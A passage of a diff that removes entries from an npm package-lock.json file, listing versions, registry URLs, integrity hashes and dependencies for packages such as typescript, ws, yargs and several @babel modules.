"https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "4.9.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.9.5.tgz", - "integrity": "sha512-1FXk9E2Hm+QzZQ7z+McJiHL4NW1F2EzMu9Nq9i3zAaGqibafqYwCVU6WyWAuyQRRzOlxou8xZSyXLEN8oKj24g==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=4.2.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": 